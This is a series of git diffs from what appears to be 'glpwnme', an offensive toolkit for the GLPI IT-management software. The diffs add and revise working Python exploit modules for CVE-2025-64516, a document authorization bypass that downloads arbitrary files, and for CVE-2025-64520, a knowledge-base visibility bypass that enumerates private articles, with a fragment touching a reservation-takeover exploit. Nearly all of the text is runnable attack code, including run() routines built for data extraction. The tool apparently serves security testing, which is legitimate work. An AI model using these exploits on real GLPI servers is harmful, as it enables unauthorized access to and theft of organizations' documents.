             self._purge_reservation(self.glpi_session, resa_id, ritem_id)
@@ -225,7 +225,7 @@ class CVE_2025_53357(GlpiExploit):
             return
         ritem_id = self._discover_reservationitem(self.glpi_session)
         if not ritem_id:
-            Log.err("No reservable item visible — cannot resolve the item key for the update")
+            Log.err("No reservable item visible - cannot resolve the item key for the update")
             return
         my_id = self.glpi_session.get_username().get("id")
         tok = self._csrf(self.glpi_session, f"{self._RESA_FORM}?id={id}")
@@ -245,7 +245,7 @@ class CVE_2025_53357(GlpiExploit):
         }, allow_redirects=False)
         after = self.glpi_session.get(f"{self._RESA_FORM}?id={id}").text
         if comment in after:
-            Log.msg(f"[green b]Reservation id={id} taken over[/] — ownership reassigned to uid={my_id}, "
+            Log.msg(f"[green b]Reservation id={id} taken over[/] - ownership reassigned to uid={my_id}, "
                     f"comment set to '{comment}'")
         else:
-            Log.err(f"Update did not take — reservation id={id} may not exist or target is patched")
+            Log.err(f"Update did not take - reservation id={id} may not exist or target is patched")

--- a/glpwnme/exploits/implementations/cve_2025_64516.py
+++ b/glpwnme/exploits/implementations/cve_2025_64516.py
@@ -8,7 +8,7 @@ from ..lowpriv import spawn_lowpriv
 
 class CVE_2025_64516(GlpiExploit):
     """
-    Broken Object Level Authorization on GLPI documents — any authenticated user
+    Broken Object Level Authorization on GLPI documents - any authenticated user
     can download a document attached to ANY item, regardless of the item it is
     actually linked to (GLPI < 10.0.21 and 11.0.0 - 11.0.2).
 
@@ -38,7 +38,7 @@ class CVE_2025_64516(GlpiExploit):
     KnowbaseItem JOIN becomes an INNER JOIN, so the requested document must really be
     attached to the readable item. The patched build answers 403.
 
-    @author unclej4ck
+    @author Aras Duzen, TRUESEC
     @cvss 7.5
     @name CVE_2025_64516
     """
@@ -205,7 +205,7 @@ class CVE_2025_64516(GlpiExploit):
 
             ticket = self._create_ticket(lp)
             if not ticket:
-                Log.log("Low-privilege user could not open a ticket — cannot build the item context")
+                Log.log("Low-privilege user could not open a ticket - cannot build the item context")
                 return False
             # link one (throwaway) attachment to the ticket so the item has cpt > 0
             self._make_doc(self.glpi_session, f"glpwnme_decoy_{uuid.uuid4().hex[:8]}.txt", b"decoy",
@@ -220,14 +220,14 @@ class CVE_2025_64516(GlpiExploit):
             if leaked and not control_leaked:
                 Log.msg(f"Self-Service user recovered the canary bytes of an off-limits document "
                         f"(id={secret}) by pairing it with their own ticket (items_id={ticket}); the "
-                        f"same request without a readable item does not → document BOLA "
+                        f"same request without a readable item does not -> document BOLA "
                         f"(CVE-2025-64516)")
                 return True
             if control_leaked:
-                Log.log("Probe user can read the secret directly (over-privileged probe) — cannot "
+                Log.log("Probe user can read the secret directly (over-privileged probe) - cannot "
                         "attribute to the BOLA; inconclusive")
                 return False
-            Log.log("Paired request did not leak the document (documents_id check present) — patched "
+            Log.log("Paired request did not leak the document (documents_id check present) - patched "
                     "(10.0.21 / 11.0.3+)")
             return False
         finally:
@@ -247,14 +247,14 @@ class CVE_2025_64516(GlpiExploit):
         s = self.glpi_session
         ticket = self._create_ticket(s)
         if not ticket:
-            Log.err("Could not open a ticket as this user — provide a credential that may open tickets")
+            Log.err("Could not open a ticket as this user - provide a credential that may open tickets")
             return
         self._make_doc(s, "glpwnme_decoy.txt", b"decoy", itemtype="Ticket", items_id=ticket)
         try:
             r = s.get(f"{self._DOC_SEND}?docid={docid}&itemtype=Ticket&items_id={ticket}",
                       allow_redirects=False)
             if r.status_code == HTTPStatus.FORBIDDEN or r.status_code == HTTPStatus.NOT_FOUND:
-                Log.err(f"Access denied for docid={docid} — instance patched or document absent")
+                Log.err(f"Access denied for docid={docid} - instance patched or document absent")
                 return
             Log.msg(f"document.send.php returned HTTP {r.status_code} for docid={docid} via "
                     f"items_id={ticket} ({len(r.content)} bytes)")

--- a/glpwnme/exploits/implementations/cve_2025_64516.py
+++ b/glpwnme/exploits/implementations/cve_2025_64516.py
@@ -59,10 +59,6 @@ class CVE_2025_64516(GlpiExploit):
     # helpers                                                              #
     # ------------------------------------------------------------------ #
 
-    def _csrf(self, session, path):
-        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', session.get(path).text)
-        return m.group(1) if m else None
-
     def _max_doc_id(self, session):
         t = session.get("/front/document.php", allow_redirects=True).text
         ids = [int(x) for x in re.findall(r"document\.form\.php\?id=(\d+)", t)]
@@ -95,13 +91,10 @@ class CVE_2025_64516(GlpiExploit):
         upname = self._upload(session, name, content)
         if not upname:
             return None
-        tok = self._csrf(session, self._DOC_FORM)
-        if not tok:
-            return None
         before = self._max_doc_id(session)
         data = {"entities_id": "0", "name": f"glpwnme_{uuid.uuid4().hex[:8]}",
                 "_filename[0]": upname, "_prefix_filename[0]": "",
-                "add": "1", "_glpi_csrf_token": tok}
+                "add": "1"}
         if itemtype:
             data["itemtype"] = itemtype
             data["items_id"] = str(items_id)
@@ -125,26 +118,19 @@ class CVE_2025_64516(GlpiExploit):
         return None
 
     def _purge_doc(self, admin, docid):
-        c = self._csrf(admin, f"{self._DOC_FORM}?id={docid}")
-        if c:
-            admin.post(self._DOC_FORM, data={"id": docid, "purge": "purge", "_glpi_csrf_token": c},
-                       allow_redirects=False)
+        admin.post(self._DOC_FORM, data={"id": docid, "purge": "purge"},
+                   allow_redirects=False)
 
     def _purge_ticket(self, admin, ticket_id):
-        c = self._csrf(admin, f"{self._TICKET_FORM}?id={ticket_id}")
-        if c:
-            admin.post(self._TICKET_FORM, data={"id": ticket_id, "purge": "purge",
-                                                "_glpi_csrf_token": c}, allow_redirects=False)
+        admin.post(self._TICKET_FORM, data={"id": ticket_id, "purge": "purge"},
+                   allow_redirects=False)
 
     def _create_ticket(self, lp):
-        tok = self._csrf(lp, "/front/helpdesk.php") or self._csrf(lp, self._TICKET_FORM)
-        if not tok:
-            return None
         before = self._newest_ticket(lp)
         lp.post(self._TICKET_FORM, data={
             "name": f"glpwnme_probe_{uuid.uuid4().hex[:6]}", "content": "probe",
             "_users_id_requester": "0", "urgency": "3", "itilcategories_id": "0",
-            "add": "1", "_glpi_csrf_token": tok,
+            "add": "1",
         }, allow_redirects=False)
         after = self._newest_ticket(lp)
         return after if after > before else None

--- a/glpwnme/exploits/implementations/cve_2025_64516.py
+++ b/glpwnme/exploits/implementations/cve_2025_64516.py
@@ -1,0 +1,267 @@
+import re
+import uuid
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+from ..lowpriv import spawn_lowpriv
+
+
+class CVE_2025_64516(GlpiExploit):
+    """
+    Broken Object Level Authorization on GLPI documents — any authenticated user
+    can download a document attached to ANY item, regardless of the item it is
+    actually linked to (GLPI < 10.0.21 and 11.0.0 - 11.0.2).
+
+    Document::canViewFileFromItem($itemtype, $items_id) authorised a document
+    download when the *item* (itemtype/items_id passed in the URL) was readable by
+    the user AND that item had at least one attachment. It never checked that the
+    *requested* document was the one attached to that item:
+
+        // GLPI 11.0.2 src/Document.php
+        $result = $DB->request([
+            'FROM'  => Document_Item::getTable(),
+            'COUNT' => 'cpt',
+            'WHERE' => ['itemtype' => $itemtype, 'items_id' => $items_id],   // no documents_id
+        ])->current();
+        if ($result['cpt'] === 0) return false;
+        return true;
+
+    So a Self-Service user who can read one of their own tickets (with any single
+    attachment) can fetch the bytes of any document on the instance:
+
+        GET /front/document.send.php?docid=<SECRET>&itemtype=Ticket&items_id=<own ticket>
+
+    When the public FAQ is enabled the sibling KnowbaseItem path (LEFT JOIN bug)
+    extends the same leak to anonymous users.
+
+    Fix (10.0.21 / 11.0.3): the WHERE gains 'documents_id' => $this->getID() and the
+    KnowbaseItem JOIN becomes an INNER JOIN, so the requested document must really be
+    attached to the readable item. The patched build answers 403.
+
+    @author unclej4ck
+    @cvss 7.5
+    @name CVE_2025_64516
+    """
+    _impacts = "Broken Object Level Authorization, Information Disclosure, Unauthorized File Access"
+    _privilege = "User"
+    _is_check_opsec_safe = True
+    # Affected: 10.0.0-10.0.20 (fixed 10.0.21) and 11.0.0-11.0.2 (fixed 11.0.3)
+    min_version = ("10.0.0", "11.0.0")
+    max_version = ("10.0.21", "11.0.3")
+
+    _DOC_FORM = "/front/document.form.php"
+    _DOC_SEND = "/front/document.send.php"
+    _UPLOAD = "/ajax/fileupload.php"
+    _TICKET_FORM = "/front/ticket.form.php"
+    _BOGUS_ITEM = "999999999"
+
+    # ------------------------------------------------------------------ #
+    # helpers                                                              #
+    # ------------------------------------------------------------------ #
+
+    def _csrf(self, session, path):
+        m = re.search(r'name="_glpi_csrf_token"\s+value="([^"]+)"', session.get(path).text)
+        return m.group(1) if m else None
+
+    def _max_doc_id(self, session):
+        t = session.get("/front/document.php", allow_redirects=True).text
+        ids = [int(x) for x in re.findall(r"document\.form\.php\?id=(\d+)", t)]
+        return max(ids) if ids else 0
+
+    def _newest_ticket(self, session):
+        t = session.get("/front/ticket.php", allow_redirects=True).text
+        ids = [int(x) for x in re.findall(r"ticket\.form\.php\?id=(\d+)", t)]
+        return max(ids) if ids else 0
+
+    def _upload(self, session, filename, content):
+        """Upload a file to GLPI_TMP_DIR via the AJAX uploader. Returns the stored
+        name (placed under files/_tmp) or None."""
+        try:
+            r = session.post(self._UPLOAD, files={
+                "name": (None, "filename"),
+                "filename[]": (filename, content, "text/plain"),
+            })
+            item = r.json().get("filename", [{}])[0]
+            return item.get("name")
+        except Exception:
+            return None
+
+    def _make_doc(self, session, name, content, itemtype=None, items_id=None):
+        """Upload `content` and register it as a real Document (filename+filepath+mime
+        set by GLPI, so document.send.php streams it). With itemtype/items_id the new
+        document is also linked to that item (a Document_Item row). Returns the new
+        document id or None. The uploader stores the tmp file under its bare name, so
+        the document form is submitted with an empty _prefix_filename."""
+        upname = self._upload(session, name, content)
+        if not upname:
+            return None
+        tok = self._csrf(session, self._DOC_FORM)
+        if not tok:
+            return None
+        before = self._max_doc_id(session)
+        data = {"entities_id": "0", "name": f"glpwnme_{uuid.uuid4().hex[:8]}",
+                "_filename[0]": upname, "_prefix_filename[0]": "",
+                "add": "1", "_glpi_csrf_token": tok}
+        if itemtype:
+            data["itemtype"] = itemtype
+            data["items_id"] = str(items_id)
+        session.post(self._DOC_FORM, data=data, allow_redirects=False)
+        after = self._max_doc_id(session)
+        return after if after > before else None
+
+    def _seed_secret(self, admin, canary):
+        """Create an off-limits document carrying the canary bytes (owned by admin, not
+        attached to anything the probe user can see). Confirm it streams the canary for
+        an authorised reader, else the differential cannot be measured."""
+        # Unique filename per run: GLPI 11.x /ajax/fileupload.php 500s when re-uploading
+        # an existing name (PHP 8.4 upcount_name dedup) on a dirty files/_tmp.
+        docid = self._make_doc(admin, f"glpwnme_secret_{uuid.uuid4().hex[:8]}.txt", canary)
+        if not docid:
+            return None
+        r = admin.get(f"{self._DOC_SEND}?docid={docid}", allow_redirects=False)
+        if r.status_code == HTTPStatus.OK and canary in r.content:
+            return docid
+        self._purge_doc(admin, docid)
+        return None
+
+    def _purge_doc(self, admin, docid):
+        c = self._csrf(admin, f"{self._DOC_FORM}?id={docid}")
+        if c:
+            admin.post(self._DOC_FORM, data={"id": docid, "purge": "purge", "_glpi_csrf_token": c},
+                       allow_redirects=False)
+
+    def _purge_ticket(self, admin, ticket_id):
+        c = self._csrf(admin, f"{self._TICKET_FORM}?id={ticket_id}")
+        if c:
+            admin.post(self._TICKET_FORM, data={"id": ticket_id, "purge": "purge",
+                                                "_glpi_csrf_token": c}, allow_redirects=False)
+
+    def _create_ticket(self, lp):
+        tok = self._csrf(lp, "/front/helpdesk.php") or self._csrf(lp, self._TICKET_FORM)
+        if not tok:
+            return None
+        before = self._newest_ticket(lp)
+        lp.post(self._TICKET_FORM, data={
+            "name": f"glpwnme_probe_{uuid.uuid4().hex[:6]}", "content": "probe",
+            "_users_id_requester": "0", "urgency": "3", "itilcategories_id": "0",
+            "add": "1", "_glpi_csrf_token": tok,
+        }, allow_redirects=False)
+        after = self._newest_ticket(lp)
+        return after if after > before else None
+
+    # ------------------------------------------------------------------ #
+    # interface                                                            #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Document BOLA (GLPI ≤ 10.0.20 / 11.0.0-11.0.2). Any authenticated user can\n"
+        infos += "download any document by pairing it with an item they can read that has one\n"
+        infos += "attachment: [b]canViewFileFromItem[/b] counted Document_Item rows for the item\n"
+        infos += "but never checked the requested [i]documents_id[/i] was the one attached.\n"
+        infos += "  GET /front/document.send.php?docid=<SECRET>&itemtype=Ticket&items_id=<own ticket>\n"
+        infos += "With public FAQ on, the KnowbaseItem path extends it to anonymous users.\n"
+        infos += "Fix 10.0.21 / 11.0.3: WHERE gains documents_id; KB JOIN becomes INNER JOIN.\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]docid (default 1)[/i]: document id to exfiltrate\n"
+        infos += " - [i]out (optional)[/i]: file to write the recovered bytes to\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Confirm the BOLA with a spawned Self-Service user[/]\n--check\n\n"
+        infos += "[grey66]# Download document id 5 as the current (low-priv) user[/]\n--run -O docid=5\n"
+
+        infos += "\nExploit is [green b]Safe[/] (read-only; purges its probe artifacts)"
+        return infos
+
+    def check(self):
+        """Differential, run as a freshly spawned Self-Service user:
+
+          secret  = an off-limits document owned by admin, carrying canary bytes
+          ticket  = a ticket the probe user owns, with one (throwaway) attachment
+          bola    = GET send?docid=secret&itemtype=Ticket&items_id=<own ticket>
+          ctrl    = GET send?docid=secret                    (no item context)
+
+        Vulnerable when the probe user, who cannot read the secret directly, recovers
+        its canary bytes by pairing it with a readable item that has an attachment
+        (canViewFileFromItem counts the item's attachments, not the requested doc).
+        The no-context control must NOT yield the canary, which proves the document is
+        genuinely off-limits and rules out a misconfigured/over-privileged probe user.
+        On the patched build the documents_id check denies the paired request too, so
+        the canary never leaks. The signal is the canary in the body, which is robust
+        across 10.x (denials render as HTTP 200 pages) and 11.x (denials are 403)."""
+        canary = b"GLPWNME-64516-" + uuid.uuid4().hex.encode()
+        secret = self._seed_secret(self.glpi_session, canary)
+        if not secret:
+            Log.log("Could not seed a probe document (need an admin session with document rights)")
+            return False
+
+        lp, cleanup = spawn_lowpriv(self.glpi_session, profile_id="1")
+        ticket = None
+        try:
+            if lp is None:
+                Log.log("Could not spawn a low-privilege probe user (need an admin session)")
+                return False
+
+            ticket = self._create_ticket(lp)
+            if not ticket:
+                Log.log("Low-privilege user could not open a ticket — cannot build the item context")
+                return False
+            # link one (throwaway) attachment to the ticket so the item has cpt > 0
+            self._make_doc(self.glpi_session, f"glpwnme_decoy_{uuid.uuid4().hex[:8]}.txt", b"decoy",
+                           itemtype="Ticket", items_id=ticket)
+
+            bola = lp.get(f"{self._DOC_SEND}?docid={secret}&itemtype=Ticket&items_id={ticket}",
+                          allow_redirects=False)
+            ctrl = lp.get(f"{self._DOC_SEND}?docid={secret}", allow_redirects=False)
+
+            leaked = canary in bola.content
+            control_leaked = canary in ctrl.content
+            if leaked and not control_leaked:
+                Log.msg(f"Self-Service user recovered the canary bytes of an off-limits document "
+                        f"(id={secret}) by pairing it with their own ticket (items_id={ticket}); the "
+                        f"same request without a readable item does not → document BOLA "
+                        f"(CVE-2025-64516)")
+                return True
+            if control_leaked:
+                Log.log("Probe user can read the secret directly (over-privileged probe) — cannot "
+                        "attribute to the BOLA; inconclusive")
+                return False
+            Log.log("Paired request did not leak the document (documents_id check present) — patched "
+                    "(10.0.21 / 11.0.3+)")
+            return False
+        finally:
+            if ticket:
+                self._purge_ticket(self.glpi_session, ticket)
+            self._purge_doc(self.glpi_session, secret)
+            if lp is not None:
+                cleanup()
+
+    def run(self, docid="1", out=None):
+        """Download an arbitrary document by id using a readable-item context.
+
+        Uses the current session (supply a low-privilege credential to demonstrate the
+        privilege bypass). Opens a throwaway ticket, links one attachment to it, then
+        requests the target document through that ticket. A document backed by a real
+        file streams its bytes; the access decision is the vulnerability."""
+        s = self.glpi_session
+        ticket = self._create_ticket(s)
+        if not ticket:
+            Log.err("Could not open a ticket as this user — provide a credential that may open tickets")
+            return
+        self._make_doc(s, "glpwnme_decoy.txt", b"decoy", itemtype="Ticket", items_id=ticket)
+        try:
+            r = s.get(f"{self._DOC_SEND}?docid={docid}&itemtype=Ticket&items_id={ticket}",
+                      allow_redirects=False)
+            if r.status_code == HTTPStatus.FORBIDDEN or r.status_code == HTTPStatus.NOT_FOUND:
+                Log.err(f"Access denied for docid={docid} — instance patched or document absent")
+                return
+            Log.msg(f"document.send.php returned HTTP {r.status_code} for docid={docid} via "
+                    f"items_id={ticket} ({len(r.content)} bytes)")
+            if out and r.content:
+                with open(out, "wb") as fh:
+                    fh.write(r.content)
+                Log.msg(f"Wrote {len(r.content)} bytes to [green b]{out}[/green b]")
+            self._write_log(f"Recovered docid={docid} ({len(r.content)} B) via CVE-2025-64516 BOLA")
+        finally:
+            self._purge_ticket(s, ticket)

--- a/glpwnme/exploits/implementations/cve_2025_64520.py
+++ b/glpwnme/exploits/implementations/cve_2025_64520.py
@@ -149,52 +149,6 @@ class CVE_2025_64520(GlpiExploit):
                 "_glpi_csrf_token": csrf,
             }, allow_redirects=False)
 
-    def _search_kb_via_engine(self, secondary_user, secondary_pass):
-        """
-        Search for our probe KB article using the GLPI search engine
-        as a secondary (non-admin) user.
-
-        Returns True if the probe article appears, False otherwise.
-        """
-        # Build a fresh HTTP session for the secondary user
-        import requests
-        s = requests.Session()
-        s.verify = False
-
-        login_page = s.get(self.glpi_session.r("/front/login.php"), allow_redirects=True)
-        if login_page.status_code != HTTPStatus.OK:
-            return None
-
-        csrf = GlpiUtils.extract_csrf(login_page.text)
-        fields = GlpiUtils.extract_login_field(login_page.text)
-
-        s.post(
-            self.glpi_session.r("/front/login.php"),
-            data={
-                fields["login"]:    secondary_user,
-                fields["password"]: secondary_pass,
-                "noAUTO":           "0",
-                "_glpi_csrf_token": csrf,
-            },
-            allow_redirects=True,
-        )
-
-        # Search for the probe article
-        search_resp = s.get(
-            self.glpi_session.r("/front/knowbaseitem.php"),
-            params={
-                "criteria[0][field]":      "6",
-                "criteria[0][searchtype]": "contains",
-                "criteria[0][value]":      self._KB_NAME,
-                "search":                  "Search",
-                "start":                   "0",
-            },
-            allow_redirects=True,
-            verify=False,
-        )
-
-        return self._KB_NAME in search_resp.text
-
     # ------------------------------------------------------------------ #
     # Exploit interface                                                    #
     # ------------------------------------------------------------------ #
@@ -290,8 +244,7 @@ class CVE_2025_64520(GlpiExploit):
         Enumerate all KB articles accessible via the search engine as a
         non-admin user, including those that should be invisible.
         """
-        import requests
-        s = requests.Session()
+        s = self.glpi_session.get_fresh_session_copy()
         s.verify = False
 
         login_page = s.get(self.glpi_session.r("/front/login.php"), allow_redirects=True)

--- a/glpwnme/exploits/implementations/cve_2025_64520.py
+++ b/glpwnme/exploits/implementations/cve_2025_64520.py
@@ -1,0 +1,318 @@
+import re
+import base64
+import json
+from http import HTTPStatus
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+from glpwnme.exploits.utils import GlpiUtils
+
+
+class CVE_2025_64520(GlpiExploit):
+    """
+    Unauthorized Knowledge Base Article Access via Missing Search Visibility.
+
+    GLPI's Search engine (Search.php) handles visibility restrictions through
+    per-itemtype switch cases that add WHERE clauses and JOIN statements.
+    The 'KnowbaseItem' case was missing from two critical switch blocks:
+
+      Search::addDefaultWhere()  → builds the base WHERE condition
+      Search::addJoin()          → adds JOIN tables for visibility filters
+
+    KnowbaseItem::addVisibilityRestrict() and ::addVisibilityJoins() exist
+    and are used in the standalone KB display path, but were never wired into
+    the general Search engine.  As a result, any authenticated user could
+    execute a generic search against KnowbaseItem and receive all articles —
+    including those restricted to specific profiles, entities, or users.
+
+    Fix (commit a3d5cc4a63, GLPI 10.0.21 / 11.0.3):
+      Added KnowbaseItem cases to both switch statements in Search.php,
+      routing through KnowbaseItem::addVisibilityRestrict() and
+      KnowbaseItem::addVisibilityJoins() so that visibility checks are
+      enforced consistently in the general search engine.
+
+    @author unclej4ck
+    @cvss 4.3
+    @name CVE_2025_64520
+    """
+    _impacts = "Unauthorized Knowledge Base Article Disclosure"
+    _privilege = "ReadOnly"
+    _is_check_opsec_safe = False
+    min_version = "10.0.0"
+    max_version = "10.0.21"
+    require_api = True
+
+    _KB_NAME = "glpwnme_visibility_64520"
+
+    # ------------------------------------------------------------------ #
+    # REST API helpers                                                     #
+    # ------------------------------------------------------------------ #
+
+    def _api_init(self, username=None, password=None):
+        """initSession via Basic auth. Defaults to the provided (admin) creds; pass
+        username/password to authenticate the API as another (low-priv) user."""
+        if username is None:
+            creds = self.glpi_session.credentials
+            if not creds or not (creds.username and creds.password):
+                return None
+            username, password = creds.username, creds.password
+        auth_b64 = base64.b64encode(f"{username}:{password}".encode()).decode()
+        try:
+            resp = self.get("/apirest.php/initSession", headers={"Authorization": f"Basic {auth_b64}"}, allow_redirects=False)
+            if resp.status_code == HTTPStatus.OK:
+                return resp.json().get("session_token")
+        except Exception:
+            pass
+        return None
+
+    def _restrict_kb_to_superadmin(self, kb_id):
+        """Target the KB article to the Super-Admin profile only, so a low-priv user
+        must NOT see it on a patched build."""
+        csrf = GlpiUtils.extract_csrf(
+            self.get(f"/front/knowbaseitem.form.php?id={kb_id}", allow_redirects=True).text)
+        if csrf:
+            self.post("/front/knowbaseitem.form.php", data={
+                "addvisibility": "1", "_type": "Profile", "knowbaseitems_id": kb_id,
+                "profiles_id": "4", "entities_id": "0", "is_recursive": "1",
+                "_glpi_csrf_token": csrf,
+            }, allow_redirects=False)
+
+    def _api_req(self, method, path, token, **kwargs):
+        return self.glpi_session.sess.request(
+            method,
+            self.glpi_session.r(f"/apirest.php/{path}"),
+            headers={"Session-Token": token, "Content-Type": "application/json"},
+            verify=False,
+            allow_redirects=False,
+            **kwargs,
+        )
+
+    def _api_kill(self, token):
+        self.get("/apirest.php/killSession", headers={"Session-Token": token}, allow_redirects=False)
+
+    # ------------------------------------------------------------------ #
+    # KB helpers                                                           #
+    # ------------------------------------------------------------------ #
+
+    def _get_csrf(self):
+        r = self.get("/front/knowbaseitem.form.php", allow_redirects=True)
+        return GlpiUtils.extract_csrf(r.text) if r.status_code == HTTPStatus.OK else None
+
+    def _create_kb_item(self):
+        """Create a private KB article visible only to the creator (admin)."""
+        csrf = self._get_csrf()
+        if not csrf:
+            return None
+        resp = self.post("/front/knowbaseitem.form.php", data={
+            "name":              self._KB_NAME,
+            "answer":            "glpwnme visibility probe for CVE-2025-64520",
+            "is_faq":            "0",
+            "add":               "1",
+            "_glpi_csrf_token":  csrf,
+        }, allow_redirects=False)
+
+        if resp.status_code not in (HTTPStatus.FOUND, HTTPStatus.SEE_OTHER, HTTPStatus.OK):
+            return None
+
+        # Get the ID from the redirect Location or by searching the list
+        loc = resp.headers.get("Location", "")
+        m = re.search(r"id=(\d+)", loc)
+        if m:
+            return m.group(1)
+
+        # Fallback: search for it
+        list_resp = self.get("/front/knowbaseitem.php", allow_redirects=True)
+        m = re.search(
+            r'knowbaseitem\.form\.php\?id=(\d+).*?' + re.escape(self._KB_NAME),
+            list_resp.text, re.DOTALL
+        )
+        return m.group(1) if m else None
+
+    def _delete_kb_item(self, kb_id):
+        csrf = GlpiUtils.extract_csrf(
+            self.get(f"/front/knowbaseitem.form.php?id={kb_id}", allow_redirects=True).text
+        )
+        if csrf:
+            self.post("/front/knowbaseitem.form.php", data={
+                "id":               kb_id,
+                "purge":            "purge",
+                "_glpi_csrf_token": csrf,
+            }, allow_redirects=False)
+
+    def _search_kb_via_engine(self, secondary_user, secondary_pass):
+        """
+        Search for our probe KB article using the GLPI search engine
+        as a secondary (non-admin) user.
+
+        Returns True if the probe article appears, False otherwise.
+        """
+        # Build a fresh HTTP session for the secondary user
+        import requests
+        s = requests.Session()
+        s.verify = False
+
+        login_page = s.get(self.glpi_session.r("/front/login.php"), allow_redirects=True)
+        if login_page.status_code != HTTPStatus.OK:
+            return None
+
+        csrf = GlpiUtils.extract_csrf(login_page.text)
+        fields = GlpiUtils.extract_login_field(login_page.text)
+
+        s.post(
+            self.glpi_session.r("/front/login.php"),
+            data={
+                fields["login"]:    secondary_user,
+                fields["password"]: secondary_pass,
+                "noAUTO":           "0",
+                "_glpi_csrf_token": csrf,
+            },
+            allow_redirects=True,
+        )
+
+        # Search for the probe article
+        search_resp = s.get(
+            self.glpi_session.r("/front/knowbaseitem.php"),
+            params={
+                "criteria[0][field]":      "6",
+                "criteria[0][searchtype]": "contains",
+                "criteria[0][value]":      self._KB_NAME,
+                "search":                  "Search",
+                "start":                   "0",
+            },
+            allow_redirects=True,
+            verify=False,
+        )
+
+        return self._KB_NAME in search_resp.text
+
+    # ------------------------------------------------------------------ #
+    # Exploit interface                                                    #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "KB visibility bypass via missing Search engine restrictions (GLPI 10.0.0–10.0.20 | 11.0.0–11.0.2).\n"
+        infos += "The GLPI search engine lacked [b]KnowbaseItem[/b] cases in the WHERE/JOIN\n"
+        infos += "switch blocks. Any authenticated user could search for all KB articles\n"
+        infos += "via [b]/front/knowbaseitem.php[/b] regardless of visibility settings.\n"
+
+        infos += "\n[u]Required:[/u]\n"
+        infos += " - Any authenticated user (Read-Only or above)\n"
+        infos += " - At least one KB article exists with restricted visibility\n"
+
+        infos += "\n[u]Params (check):[/u]\n"
+        infos += " - [i]tech_user (default: tech)[/i]: Non-admin user for secondary session\n"
+        infos += " - [i]tech_pass (default: tech)[/i]: Password for secondary user\n"
+
+        infos += "\n[u]Fix[/u]: commit [b]a3d5cc4a63[/b] (GLPI 10.0.21 / 11.0.3)\n"
+        infos += " Added KnowbaseItem cases to Search.php switch blocks.\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check with default tech/tech secondary user[/]\n"
+        infos += "--check --no-opsec\n\n"
+        infos += "[grey66]# Check with custom non-admin credentials[/]\n"
+        infos += "--check --no-opsec -O tech_user=normaluser tech_pass=normalpass\n\n"
+        infos += "[grey66]# Dump all KB articles including private ones[/]\n"
+        infos += "--run\n"
+
+        infos += "\nExploit is [yellow b]Moderate[/] (creates and deletes a KB article)"
+        return infos
+
+    def check(self):
+        """
+        Create a KB article restricted to the Super-Admin profile, then search for it
+        through the REST API as a freshly-created low-privilege (Self-Service) user.
+
+        The CVE is that the Search engine lacked the KnowbaseItem visibility WHERE/JOIN,
+        so a restricted article was returned to users who must not see it; 10.0.21/11.0.3
+        wired KnowbaseItem::addVisibilityRestrict()/Joins() into the engine (used by the
+        API search). On vuln the article comes back to the low-priv user; on patched it
+        is filtered out.
+
+        FP-safe: the prior version searched the WEB list (which does not differentiate)
+        and ran as the admin session, so it fired on patched. This uses the API path (the
+        advisory's vector) and a low-priv API session; if the REST API is disabled or the
+        low-priv API login fails it returns False rather than guess.
+        """
+        from ..lowpriv import spawn_lowpriv, _PROBE_NAME, _PROBE_PW
+        kb_id = self._create_kb_item()
+        if not kb_id:
+            Log.log("Could not create KB probe article — need an admin session")
+            return False
+        lp, cleanup = spawn_lowpriv(self.glpi_session)
+        try:
+            self._restrict_kb_to_superadmin(kb_id)
+            token = self._api_init(_PROBE_NAME, _PROBE_PW) if lp else None
+            if not token:
+                Log.log("REST API not enabled or low-priv API login failed — cannot confirm (needs API)")
+                return False
+            r = self._api_req(
+                "GET",
+                "search/KnowbaseItem?criteria[0][field]=6&criteria[0][searchtype]=contains"
+                f"&criteria[0][value]={self._KB_NAME}&forcedisplay[0]=6",
+                token,
+            )
+            self._api_kill(token)
+            if self._KB_NAME in r.text:
+                Log.msg("Super-Admin-restricted KB article returned to a low-priv user via the API "
+                        "→ [green b]KB visibility bypass confirmed[/green b]")
+                return True
+            Log.log("Restricted KB article not returned via API — visibility enforced (patched 10.0.21+)")
+            return False
+        finally:
+            cleanup()
+            self._delete_kb_item(kb_id)
+
+    def run(self, tech_user="tech", tech_pass="tech"):
+        """
+        Enumerate all KB articles accessible via the search engine as a
+        non-admin user, including those that should be invisible.
+        """
+        import requests
+        s = requests.Session()
+        s.verify = False
+
+        login_page = s.get(self.glpi_session.r("/front/login.php"), allow_redirects=True)
+        csrf = GlpiUtils.extract_csrf(login_page.text)
+        fields = GlpiUtils.extract_login_field(login_page.text)
+
+        login_resp = s.post(
+            self.glpi_session.r("/front/login.php"),
+            data={
+                fields["login"]:    tech_user,
+                fields["password"]: tech_pass,
+                "noAUTO":           "0",
+                "_glpi_csrf_token": csrf,
+            },
+            allow_redirects=True,
+        )
+        if "logout" not in login_resp.text:
+            Log.err(f"Login as [{tech_user}] failed")
+            return
+
+        # Enumerate all KB articles (no visibility filtering on vulnerable versions)
+        search_resp = s.get(
+            self.glpi_session.r("/front/knowbaseitem.php"),
+            params={"search": "Search", "start": "0", "is_deleted": "0"},
+            allow_redirects=True,
+            verify=False,
+        )
+
+        # Extract KB article names and IDs from results table
+        articles = re.findall(
+            r'knowbaseitem\.form\.php\?id=(\d+).*?<td[^>]*>([^<]{3,100})</td>',
+            search_resp.text, re.DOTALL
+        )
+        articles = [(aid, name.strip()) for aid, name in articles
+                    if name.strip() and aid.isdigit()]
+
+        if not articles:
+            Log.msg(f"No KB articles returned by search for [{tech_user}] — possibly patched or no articles exist")
+            return
+
+        Log.msg(f"[green b]{len(articles)} KB articles[/green b] accessible via search as [{tech_user}]:")
+        for aid, name in articles[:25]:
+            Log.msg(f"  id={aid}: {name}")
+        if len(articles) > 25:
+            Log.msg(f"  ... ({len(articles) - 25} more)")
+
+        self._write_log(f"CVE-2025-64520: {len(articles)} KB articles enumerated as {tech_user}")

--- a/glpwnme/exploits/implementations/cve_2025_64520.py
+++ b/glpwnme/exploits/implementations/cve_2025_64520.py
